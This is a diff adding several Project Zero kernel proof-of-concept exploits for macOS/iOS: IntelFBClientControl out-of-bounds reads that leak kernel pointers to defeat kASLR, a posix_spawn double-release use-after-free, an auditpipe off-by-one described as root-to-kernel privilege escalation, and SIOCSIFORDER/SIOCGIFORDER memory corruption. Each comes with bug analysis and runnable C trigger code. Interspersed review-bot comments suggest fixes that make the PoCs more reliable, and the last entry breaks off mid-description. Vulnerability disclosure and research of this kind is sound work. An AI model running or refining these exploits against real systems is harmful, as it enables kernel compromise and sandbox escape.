@@ -0,0 +1,102 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1071 + +Selector 0x921 of IntelFBClientControl ends up in AppleIntelCapriController::GetLinkConfig + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +This pointer is passed to AppleIntelFramebuffer::validateDisplayMode and the uint64 at offset +2130h is used as a C++ object pointer +on which a virtual method is called. With some heap grooming this could be used to get kernel code execution. + +tested on MacOS Sierra 10.12.2 (16C67) +*/ + +// ianbeer + +// build: clang -o capri_exec capri_exec.c -framework IOKit + +#if 0 +MacOS kernel code execution due to lack of bounds checking in AppleIntelCapriController::GetLinkConfig + +Selector 0x921 of IntelFBClientControl ends up in AppleIntelCapriController::GetLinkConfig + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +This pointer is passed to AppleIntelFramebuffer::validateDisplayMode and the uint64 at offset +2130h is used as a C++ object pointer +on which a virtual method is called. With some heap grooming this could be used to get kernel code execution. 
+ +tested on MacOS Sierra 10.12.2 (16C67) +#endif + +#include +#include +#include + +#include + +#include + +int main(int argc, char** argv){ + kern_return_t err; + + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 4096; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0x1d8; + + for (int step = 1; step < 1000; step++) { + memset(inputStruct, 0, inputStructCnt); + *(uint32_t*)inputStruct = 0x238 + (step*(0x2000/8)); + + outputStructCnt = 4096; + memset(outputStruct, 0, outputStructCnt); + + err = IOConnectCallMethod( + conn, + 0x921, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err == KERN_SUCCESS) { + break; + } + + printf("retrying 0x2000 up - %s\n", mach_error_string(err)); + } + + uint64_t* leaked = (uint64_t*)(outputStruct+3); + for (int i = 0; i < 0x1d8/8; i++) { + printf("%016llx\n", leaked[i]); + } + + return 0; +} diff --git a/platforms/macos/dos/41791.c b/platforms/macos/dos/41791.c new file mode 100755 index 000000000..248d433bb --- /dev/null +++ b/platforms/macos/dos/41791.c 
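Review bot: `uint64_t* leaked = (uint64_t*)(outputStruct+3);` in `main` forms a `uint64_t` pointer at a 3-byte offset into a `char` array, which is a misaligned, aliasing-violating access and undefined behaviour in C regardless of whether the hardware tolerates it; read each value with `uint64_t v; memcpy(&v, outputStruct + 3 + 8 * i, sizeof v);` instead. The dump loop also prints a fixed `0x1d8/8` entries regardless of the `outputStructCnt` the successful `IOConnectCallMethod` returned, and it runs even when all 999 retries failed, so the bound should derive from `outputStructCnt` and the loop should be skipped unless `err == KERN_SUCCESS`. The failure paths `return 0`, indistinguishable from success, and `conn`/`service` are never released with `IOServiceClose`/`IOObjectRelease`. The `#include` directives here (and in 41791.c below) show no header names, which is presumably an artifact of how the page was rendered rather than the committed source, but as shown the files would not compile.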
@@ -0,0 +1,70 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1104
+
+exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.
+
+It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)
+
+For the special, exception and audit ports it tries to update the new task to reflect the port action
+by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if
+any of those calls fail it calls ipc_port_release_send(port).
+
+task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail
+but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on
+the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't
+an audit session port.
+
+This means we can cause two references to be dropped on the port when only one is held leading to a
+use after free in the kernel.
+
+Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2
+*/
+
+// ianbeer
+#if 0
+MacOS/iOS kernel uaf due to double-release in posix_spawn
+
+exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.
+
+It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)
+
+For the special, exception and audit ports it tries to update the new task to reflect the port action
+by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if
+any of those calls fail it calls ipc_port_release_send(port).
+
+task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail
+but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on
+the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't
+an audit session port.
+
+This means we can cause two references to be dropped on the port when only one is held leading to a
+use after free in the kernel.
+
+Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2
+#endif
+
+#include
+#include
+#include
+
+#include
+
+int main() {
+
+ mach_port_t p = MACH_PORT_NULL;
+ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);
+ mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
+
+ posix_spawnattr_t attrs;
+ posix_spawnattr_init(&attrs);
+ posix_spawnattr_setauditsessionport_np(&attrs,p);
+
+ char* _argv[] = {"/usr/bin/id", NULL};
+ int child_pid = 0;
+ int spawn_err = posix_spawn(&child_pid,
+ "/usr/bin/id",
+ NULL, // file actions
+ &attrs,
+ _argv,
+ NULL);
+}
diff --git a/platforms/macos/dos/41797.c b/platforms/macos/dos/41797.c
new file mode 100755
index 000000000..a8a125c76
--- /dev/null
+++ b/platforms/macos/dos/41797.c
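Review bot: The `kern_return_t` results of `mach_port_allocate` and `mach_port_insert_right` are discarded, so if either fails `p` is still `MACH_PORT_NULL` and the spawn proceeds with no audit-session port, which is not the condition the header comment describes; a check such as `if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p) != KERN_SUCCESS) return 1;` would make that visible. `spawn_err` and `child_pid` are assigned but never read, and `main` has no `return`; reporting `spawn_err` with `perror`/`strerror` and returning it tells the operator whether `posix_spawn` itself was reached. `posix_spawnattr_destroy(&attrs)` and `waitpid(child_pid, ...)` also belong at the end of `main` so the spawned `/usr/bin/id` is reaped.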
@@ -0,0 +1,212 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1126 + +MacOS kernel memory corruption due to off-by-one in audit_pipe_open + +audit_pipe_open is the special file open handler for the auditpipe device (major number 10.) + +Here's the code: + + static int + audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype, + __unused proc_t p) + { + struct audit_pipe *ap; + int u; + + u = minor(dev); + if (u < 0 || u > MAX_AUDIT_PIPES) + return (ENXIO); + + AUDIT_PIPE_LIST_WLOCK(); + ap = audit_pipe_dtab[u]; + if (ap == NULL) { + ap = audit_pipe_alloc(); + if (ap == NULL) { + AUDIT_PIPE_LIST_WUNLOCK(); + return (ENOMEM); + } + audit_pipe_dtab[u] = ap; + + +We can control the minor number via mknod. Here's the definition of audit_pipe_dtab: + + static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES]; + +There's an off-by-one in the minor number bounds check + (u < 0 || u > MAX_AUDIT_PIPES) +should be + (u < 0 || u >= MAX_AUDIT_PIPES) + +The other special file operation handlers assume that the minor number of an opened device +is correct therefore it isn't validated for example in the ioctl handler: + + static int + audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data, + __unused int flag, __unused proc_t p) + { + ... + ap = audit_pipe_dtab[minor(dev)]; + KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL")); + ... + switch (cmd) { + case FIONBIO: + AUDIT_PIPE_LOCK(ap); + if (*(int *)data) + +Directly after the audit_pipe_dtab array in the bss is this global variable: + + static u_int64_t audit_pipe_drops; + +audit_pipe_drops will be incremented each time an audit message enqueue fails: + + if (ap->ap_qlen >= ap->ap_qlimit) { + ap->ap_drops++; + audit_pipe_drops++; + return; + } + +So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the +struct audit_pipe* which is read out-of-bounds. 
+ +For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file +and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record +and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe* +then the ioctl will try to use that pointer. + +This is a root to kernel privesc. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +*/ + +//ianbeer +#if 0 +MacOS kernel memory corruption due to off-by-one in audit_pipe_open + +audit_pipe_open is the special file open handler for the auditpipe device (major number 10.) + +Here's the code: + + static int + audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype, + __unused proc_t p) + { + struct audit_pipe *ap; + int u; + + u = minor(dev); + if (u < 0 || u > MAX_AUDIT_PIPES) + return (ENXIO); + + AUDIT_PIPE_LIST_WLOCK(); + ap = audit_pipe_dtab[u]; + if (ap == NULL) { + ap = audit_pipe_alloc(); + if (ap == NULL) { + AUDIT_PIPE_LIST_WUNLOCK(); + return (ENOMEM); + } + audit_pipe_dtab[u] = ap; + + +We can control the minor number via mknod. Here's the definition of audit_pipe_dtab: + + static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES]; + +There's an off-by-one in the minor number bounds check + (u < 0 || u > MAX_AUDIT_PIPES) +should be + (u < 0 || u >= MAX_AUDIT_PIPES) + +The other special file operation handlers assume that the minor number of an opened device +is correct therefore it isn't validated for example in the ioctl handler: + + static int + audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data, + __unused int flag, __unused proc_t p) + { + ... + ap = audit_pipe_dtab[minor(dev)]; + KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL")); + ... 
+ switch (cmd) { + case FIONBIO: + AUDIT_PIPE_LOCK(ap); + if (*(int *)data) + +Directly after the audit_pipe_dtab array in the bss is this global variable: + + static u_int64_t audit_pipe_drops; + +audit_pipe_drops will be incremented each time an audit message enqueue fails: + + if (ap->ap_qlen >= ap->ap_qlimit) { + ap->ap_drops++; + audit_pipe_drops++; + return; + } + +So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the +struct audit_pipe* which is read out-of-bounds. + +For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file +and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record +and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe* +then the ioctl will try to use that pointer. + +This is a root to kernel privesc. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +#endif + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main(int argc, char** argv) { + system("rm -rf /dev/auditpipe"); + system("mknod /dev/auditpipe c 10 32"); + + int fd = open("/dev/auditpipe", O_RDWR); + + if (fd == -1) { + perror("failed to open auditpipe device\n"); + exit(EXIT_FAILURE); + } + printf("opened device\n"); + + system("touch a_log_file"); + int auditerr = auditctl("a_log_file"); + if (auditerr == -1) { + perror("failed to set a new log file\n"); + } + + uint32_t qlim = 1; + int err = ioctl(fd, AUDITPIPE_SET_QLIMIT, &qlim); + if (err == -1) { + perror("AUDITPIPE_SET_QLIMIT"); + exit(EXIT_FAILURE); + } + + while(1) { + char* audit_data = "\x74hello"; + int audit_len = strlen(audit_data)+1; + audit(audit_data, audit_len); + uint32_t nread = 0; + int err = ioctl(fd, FIONREAD, &qlim); + if (err == -1) { + perror("FIONREAD"); + exit(EXIT_FAILURE); + } + } + + return 0; +} 
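Review bot: Inside the `while(1)` loop, `int err = ioctl(fd, FIONREAD, &qlim);` redeclares `err` and shadows the outer `err` from the `AUDITPIPE_SET_QLIMIT` call, and `nread` is declared but never used because the FIONREAD result is written over `qlim`; either drop `nread` or pass `&nread` and reuse the outer `err`. The `perror()` calls embed a trailing `\n` in their argument (`perror("failed to open auditpipe device\n")`), which prints the newline before the `: strerror` suffix — remove it. `audit_len` is an `int` receiving `strlen(audit_data)+1` (a `size_t`), and the `open()`ed `fd` is never closed; minor here, but the file otherwise runs with root privileges and should be tidy about resources.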
diff --git a/platforms/macos/dos/41798.c b/platforms/macos/dos/41798.c
new file mode 100755
index 000000000..3703317df
--- /dev/null
+++ b/platforms/macos/dos/41798.c
@@ -0,0 +1,138 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1069 + +MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability + +Selector 0x710 of IntelFBClientControl ends up in AppleIntelCapriController::getDisplayPipeCapability. + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +AppleIntelCapriController::getDisplayPipeCapability(AGDCFBGetDisplayCapability_t *, AGDCFBGetDisplayCapability_t *) +__text:000000000002A3AB mov r14, rdx ; output buffer, readable from userspace +__text:000000000002A3AE mov rbx, rsi ; input buffer, controlled from userspace +... +__text:000000000002A3B8 mov eax, [rbx] ; read dword +__text:000000000002A3BA mov rsi, [rdi+rax*8+0E40h] ; use as index for small inline buffer in this object +__text:000000000002A3C2 cmp byte ptr [rsi+1DCh], 0 ; fail if byte at +0x1dc is 0 +__text:000000000002A3C9 jz short ___fail +__text:000000000002A3CB add rsi, 1E0Dh ; otherwise, memcpy from that pointer +0x1e0dh +__text:000000000002A3D2 mov edx, 1D8h ; 0x1d8 bytes +__text:000000000002A3D7 mov rdi, r14 ; to the buffer which will be sent back to userspace +__text:000000000002A3DA call _memcpy + +For this PoC we try to read the pointers at 0x2000 byte boundaries after this allocation; with luck there will be a vtable +pointer there which will allow us to read back vtable contents and defeat kASLR. + +With a bit more effort this could be turned into an (almost) arbitrary read by for example spraying the kernel heap with the desired read target +then using a larger offset hoping to land in one of the sprayed buffers. A kernel arbitrary read would, for example, allow you to read the sandbox.kext +HMAC key and forge sandbox extensions if it still works like that. 
+ +tested on MacOS Sierra 10.12.2 (16C67) +*/ + +// ianbeer + +// build: clang -o capri_mem capri_mem.c -framework IOKit + +#if 0 +MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability + +Selector 0x710 of IntelFBClientControl ends up in AppleIntelCapriController::getDisplayPipeCapability. + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +AppleIntelCapriController::getDisplayPipeCapability(AGDCFBGetDisplayCapability_t *, AGDCFBGetDisplayCapability_t *) +__text:000000000002A3AB mov r14, rdx ; output buffer, readable from userspace +__text:000000000002A3AE mov rbx, rsi ; input buffer, controlled from userspace +... +__text:000000000002A3B8 mov eax, [rbx] ; read dword +__text:000000000002A3BA mov rsi, [rdi+rax*8+0E40h] ; use as index for small inline buffer in this object +__text:000000000002A3C2 cmp byte ptr [rsi+1DCh], 0 ; fail if byte at +0x1dc is 0 +__text:000000000002A3C9 jz short ___fail +__text:000000000002A3CB add rsi, 1E0Dh ; otherwise, memcpy from that pointer +0x1e0dh +__text:000000000002A3D2 mov edx, 1D8h ; 0x1d8 bytes +__text:000000000002A3D7 mov rdi, r14 ; to the buffer which will be sent back to userspace +__text:000000000002A3DA call _memcpy + +For this PoC we try to read the pointers at 0x2000 byte boundaries after this allocation; with luck there will be a vtable +pointer there which will allow us to read back vtable contents and defeat kASLR. + +With a bit more effort this could be turned into an (almost) arbitrary read by for example spraying the kernel heap with the desired read target +then using a larger offset hoping to land in one of the sprayed buffers. A kernel arbitrary read would, for example, allow you to read the sandbox.kext +HMAC key and forge sandbox extensions if it still works like that. 
+ +tested on MacOS Sierra 10.12.2 (16C67) +#endif + +#include +#include +#include + +#include + +#include + +int main(int argc, char** argv){ + kern_return_t err; + + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 4096; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0x1d8; + + for (int step = 1; step < 1000; step++) { + memset(inputStruct, 0, inputStructCnt); + *(uint32_t*)inputStruct = 0x238 + (step*(0x2000/8)); + + outputStructCnt = 4096; + memset(outputStruct, 0, outputStructCnt); + + err = IOConnectCallMethod( + conn, + 0x710, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err == KERN_SUCCESS) { + break; + } + + printf("retrying 0x2000 up - %s\n", mach_error_string(err)); + } + + uint64_t* leaked = (uint64_t*)(outputStruct+3); + for (int i = 0; i < 0x1d8/8; i++) { + printf("%016llx\n", leaked[i]); + } + + return 0; +} diff --git a/platforms/multiple/dos/41792.c b/platforms/multiple/dos/41792.c new file mode 100755 index 000000000..1b9889bc7 --- /dev/null +++ b/platforms/multiple/dos/41792.c 
@@ -0,0 +1,113 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1108
+
+SIOCSIFORDER is a new ioctl added in iOS 10. It can be called on a regular tcp socket, so from pretty much any sandbox.
+
+it falls through to calling:
+ ifnet_reset_order(ordered_indices, ifo->ifo_count)
+where ordered_indicies points to attacker-controlled bytes.
+
+ifnet_reset_order contains this code:
+
+ for (u_int32_t order_index = 0; order_index < count; order_index++) {
+ u_int32_t interface_index = ordered_indices[order_index]; <---------------- (a)
+ if (interface_index == IFSCOPE_NONE ||
+ (int)interface_index > if_index) { <-------------------------- (b)
+ break;
+ }
+ ifp = ifindex2ifnet[interface_index]; <-------------------------- (c)
+ if (ifp == NULL) {
+ continue;
+ }
+ ifnet_lock_exclusive(ifp);
+ TAILQ_INSERT_TAIL(&ifnet_ordered_head, ifp, if_ordered_link); <---------- (d)
+ ifnet_lock_done(ifp);
+ if_ordered_count++;
+ }
+
+at (a) a controlled 32-bit value is read into an unsigned 32-bit variable.
+at (b) this value is cast to a signed type for a bounds check
+at (c) this value is used as an unsigned index
+
+by providing a value with the most-significant bit set making it negative when cast to a signed type
+we can pass the bounds check at (b) and lead to reading an interface pointer out-of-bounds
+below the ifindex2ifnet array.
+
+This leads very directly to memory corruption at (d) which will add the value read out of bounds to a list structure.
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+
+(on 64-bit platforms the array index wouldn't wrap around so the read would actually occur > 2GB above the array, not below)
+*/
+
+// ianbeer
+#if 0
+MacOS/iOS kernel memory corruption due to Bad bounds checking in SIOCSIFORDER socket ioctl
+
+SIOCSIFORDER is a new ioctl added in iOS 10. It can be called on a regular tcp socket, so from pretty much any sandbox.
+
+it falls through to calling:
+ ifnet_reset_order(ordered_indices, ifo->ifo_count)
+where ordered_indicies points to attacker-controlled bytes.
+
+ifnet_reset_order contains this code:
+
+ for (u_int32_t order_index = 0; order_index < count; order_index++) {
+ u_int32_t interface_index = ordered_indices[order_index]; <---------------- (a)
+ if (interface_index == IFSCOPE_NONE ||
+ (int)interface_index > if_index) { <-------------------------- (b)
+ break;
+ }
+ ifp = ifindex2ifnet[interface_index]; <-------------------------- (c)
+ if (ifp == NULL) {
+ continue;
+ }
+ ifnet_lock_exclusive(ifp);
+ TAILQ_INSERT_TAIL(&ifnet_ordered_head, ifp, if_ordered_link); <---------- (d)
+ ifnet_lock_done(ifp);
+ if_ordered_count++;
+ }
+
+at (a) a controlled 32-bit value is read into an unsigned 32-bit variable.
+at (b) this value is cast to a signed type for a bounds check
+at (c) this value is used as an unsigned index
+
+by providing a value with the most-significant bit set making it negative when cast to a signed type
+we can pass the bounds check at (b) and lead to reading an interface pointer out-of-bounds
+below the ifindex2ifnet array.
+
+This leads very directly to memory corruption at (d) which will add the value read out of bounds to a list structure.
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+#endif
+
+#include
+#include
+#include
+
+#include
+#include
+
+#include
+
+struct if_order {
+ u_int32_t ifo_count;
+ u_int32_t ifo_reserved;
+ mach_vm_address_t ifo_ordered_indices; /* array of u_int32_t */
+};
+
+#define SIOCSIFORDER _IOWR('i', 178, struct if_order)
+
+int main() {
+ uint32_t data[] = {0x80001234};
+
+ struct if_order ifo;
+ ifo.ifo_count = 1;
+ ifo.ifo_reserved = 0;
+ ifo.ifo_ordered_indices = (mach_vm_address_t)data;
+
+ int fd = socket(PF_INET, SOCK_STREAM, 0);
+ int ret = ioctl(fd, SIOCSIFORDER, &ifo);
+
+ return 0;
+}
diff --git a/platforms/multiple/dos/41793.c b/platforms/multiple/dos/41793.c
new file mode 100755
index 000000000..64243e67f
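Review bot: `ret` from `ioctl(fd, SIOCSIFORDER, &ifo)` is stored but never examined and `socket()` is not checked for -1, so a failed socket call feeds descriptor -1 to the ioctl and the program still exits 0 having done nothing; `if (fd < 0) { perror("socket"); return 1; }` and a `perror("ioctl")` when `ret != 0` would make the outcome observable. `fd` is also never closed, and `ifo` could be written with a designated initializer (`struct if_order ifo = { .ifo_count = 1, .ifo_ordered_indices = (mach_vm_address_t)data };`) so no field is left to chance.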
--- /dev/null
+++ b/platforms/multiple/dos/41793.c
@@ -0,0 +1,185 @@
+/*
+
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1111
+
+SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the
+ifnet_ordered_head linked list of interfaces.
+
+SIOCSIFORDER clears the existing list and allows userspace to specify an array of
+interface indexes used to build a new list.
+
+SIOCGIFORDER allow userspace to query the list of interface identifiers used to build
+that list.
+
+Here's the relevant code for SIOCGIFORDER:
+
+ case SIOCGIFORDER: { /* struct if_order */
+ struct if_order *ifo = (struct if_order *)(void *)data;
+
+ u_int32_t ordered_count = if_ordered_count; <----------------- (a)
+
+ if (ifo->ifo_count == 0 ||
+ ordered_count == 0) {
+ ifo->ifo_count = ordered_count;
+ } else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) {
+ u_int32_t count_to_copy =
+ MIN(ordered_count, ifo->ifo_count); <---------------- (b)
+ size_t length = (count_to_copy * sizeof(u_int32_t));
+ struct ifnet *ifp = NULL;
+ u_int32_t cursor = 0;
+
+ ordered_indices = _MALLOC(length, M_NECP, M_WAITOK);
+ if (ordered_indices == NULL) {
+ error = ENOMEM;
+ break;
+ }
+
+ ifnet_head_lock_shared();
+ TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) {
+ if (cursor > count_to_copy) { <------------------ (c)
+ break;
+ }
+ ordered_indices[cursor] = ifp->if_index; <------------------ (d)
+ cursor++;
+ }
+ ifnet_head_done();
+
+
+at (a) it reads the actual length of the list (of course it should take the lock here too,
+but that's not the bug I'm reporting)
+
+at (b) it computes the number of entries it wants to copy as the minimum of the requested number
+and the actual number of entries in the list
+
+the loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that
+the write at (d) won't go out of bounds, but it should be a >=, not a >, as cursor is the number of
+elements *already* written. If count_to_copy is 0, and cursor is 0 the write will still happen!
+
+By requesting one fewer entries than are actually in the list the code will always write one interface index
+entry one off the end of the ordered_indices array.
+
+This poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries
+then writes 5 entries into there.
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+*/
+
+// ianbeer
+// add gzalloc_size=16 to boot args to see the actual OOB write more easily
+#if 0
+MacOS/iOS kernel memory corruption due to off-by-one in SIOCGIFORDER socket ioctl
+
+SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the
+ifnet_ordered_head linked list of interfaces.
+
+SIOCSIFORDER clears the existing list and allows userspace to specify an array of
+interface indexes used to build a new list.
+
+SIOCGIFORDER allow userspace to query the list of interface identifiers used to build
+that list.
+
+Here's the relevant code for SIOCGIFORDER:
+
+ case SIOCGIFORDER: { /* struct if_order */
+ struct if_order *ifo = (struct if_order *)(void *)data;
+
+ u_int32_t ordered_count = if_ordered_count; <----------------- (a)
+
+ if (ifo->ifo_count == 0 ||
+ ordered_count == 0) {
+ ifo->ifo_count = ordered_count;
+ } else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) {
+ u_int32_t count_to_copy =
+ MIN(ordered_count, ifo->ifo_count); <---------------- (b)
+ size_t length = (count_to_copy * sizeof(u_int32_t));
+ struct ifnet *ifp = NULL;
+ u_int32_t cursor = 0;
+
+ ordered_indices = _MALLOC(length, M_NECP, M_WAITOK);
+ if (ordered_indices == NULL) {
+ error = ENOMEM;
+ break;
+ }
+
+ ifnet_head_lock_shared();
+ TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) {
+ if (cursor > count_to_copy) { <------------------ (c)
+ break;
+ }
+ ordered_indices[cursor] = ifp->if_index; <------------------ (d)
+ cursor++;
+ }
+ ifnet_head_done();
+
+
+at (a) it reads the actual length of the list (of course it should take the lock here too,
+but that's not the bug I'm reporting)
+
+at (b) it computes the number of entries it wants to copy as the minimum of the requested number
+and the actual number of entries in the list
+
+the loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that
+the write at (d) won't go out of bounds, but it should be a >=, not a >, as cursor is the number of
+elements *already* written. If count_to_copy is 0, and cursor is 0 the write will still happen!
+
+By requesting one fewer entries than are actually in the list the code will always write one interface index
+entry one off the end of the ordered_indices array.
+
+This poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries
+then writes 5 entries into there.
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+#endif
+
+#include
+#include
+#include
+
+#include
+#include
+
+#include
+
+struct if_order {
+ u_int32_t ifo_count;
+ u_int32_t ifo_reserved;
+ mach_vm_address_t ifo_ordered_indices; /* array of u_int32_t */
+};
+
+#define SIOCSIFORDER _IOWR('i', 178, struct if_order)
+#define SIOCGIFORDER _IOWR('i', 179, struct if_order)
+
+void set(int fd, uint32_t n) {
+ uint32_t* data = malloc(n*4);
+ for (int i = 0; i < n; i++) {
+ data[i] = 1;
+ }
+
+ struct if_order ifo;
+ ifo.ifo_count = n;
+ ifo.ifo_reserved = 0;
+ ifo.ifo_ordered_indices = (mach_vm_address_t)data;
+
+ ioctl(fd, SIOCSIFORDER, &ifo);
+ free(data);
+}
+
+void get(int fd, uint32_t n) {
+ uint32_t* data = malloc(n*4);
+ memset(data, 0, n*4);
+
+ struct if_order ifo;
+ ifo.ifo_count = n;
+ ifo.ifo_reserved = 0;
+ ifo.ifo_ordered_indices = (mach_vm_address_t)data;
+
+ ioctl(fd, SIOCGIFORDER, &ifo);
+ free(data);
+}
+
+int main() {
+ int fd = socket(PF_INET, SOCK_STREAM, 0);
+ set(fd, 5);
+ get(fd, 4);
+ return 0;
+}
diff --git a/platforms/multiple/dos/41794.c b/platforms/multiple/dos/41794.c
new file mode 100755
index 000000000..10d5e8474
--- /dev/null
+++ b/platforms/multiple/dos/41794.c
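Review bot: In `set` and `get` the `malloc(n*4)` result is never checked and `n*4` is evaluated in `uint32_t`, so it wraps for large `n` and the following writes would run off the end of a too-small buffer; `uint32_t* data = calloc(n, sizeof *data); if (!data) return;` avoids both and makes the `memset` in `get` redundant. The loop `for (int i = 0; i < n; i++)` compares a signed `int` with the `uint32_t` parameter (`-Wsign-compare`); declare `i` as `uint32_t`. The `ioctl` return values are discarded in both helpers and `fd` is neither checked for -1 nor closed in `main`, so a failed `socket()` call silently turns the whole run into a no-op that still exits 0.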
@@ -0,0 +1,146 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1116
+
+necp_open is a syscall used to obtain a new necp file descriptor
+
+The necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.
+
+Here's the relevant code from necp_open:
+
+ error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)
+ if (error != 0) {
+ goto done;
+ }
+
+ if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,
+ M_WAITOK | M_ZERO)) == NULL) {
+ error = ENOMEM;
+ goto done;
+ }
+
+ fd_data->flags = uap->flags;
+ LIST_INIT(&fd_data->clients);
+ lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);
+ klist_init(&fd_data->si.si_note);
+ fd_data->proc_pid = proc_pid(p);
+
+ fp->f_fglob->fg_flag = FREAD;
+ fp->f_fglob->fg_ops = &necp_fd_ops;
+ fp->f_fglob->fg_data = fd_data; <-------------------------- (b)
+
+ proc_fdlock(p);
+
+ *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);
+ procfdtbl_releasefd(p, fd, NULL);
+ fp_drop(p, fd, fp, 1);
+ proc_fdunlock(p); <--------------------- (c)
+
+ *retval = fd;
+
+ lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)
+ LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)
+ lck_rw_done(&necp_fd_lock);
+
+at (a) a new file descriptor and file object is allocated for the calling process
+at (b) that new file's fg_data is set to the fd_data heap allocation
+at (c) the process fd table is unlocked meaning that other processes can now look up
+ the new fd and get the associated fp
+
+at (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list
+
+The bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)
+another thread can call close on the new fd which will free fd_data before we enqueue it at (e).
+
